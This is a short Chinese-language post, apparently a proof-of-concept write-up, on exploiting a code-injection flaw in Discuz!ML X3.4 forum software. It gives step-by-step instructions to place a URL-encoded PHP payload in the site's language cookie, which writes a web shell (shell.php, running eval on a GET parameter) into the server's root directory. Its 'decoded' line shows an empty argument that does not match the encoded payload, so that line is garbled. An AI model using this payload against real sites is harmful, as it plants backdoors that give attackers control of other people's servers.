Discuz!ML官网下载:http://discuz.ml/download
我下的是官网最新版x3.4。
大约共有60多个页面可以利用,包含论坛主页。
GET一下然后找到cookie里面的xxxlanguage参数,将xxx_language的值改为exp的内容,然后提交并返回200。
exp:
%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524%2547%2545%2554%255b%2522ss%2522%255d%29%253b%253f%253e%27%29%29.%27解码:
'. file_put_contents('shell.php',urldecode('')).'
访问主页后,根目录下会生成一个shell.php文件。
利用成功
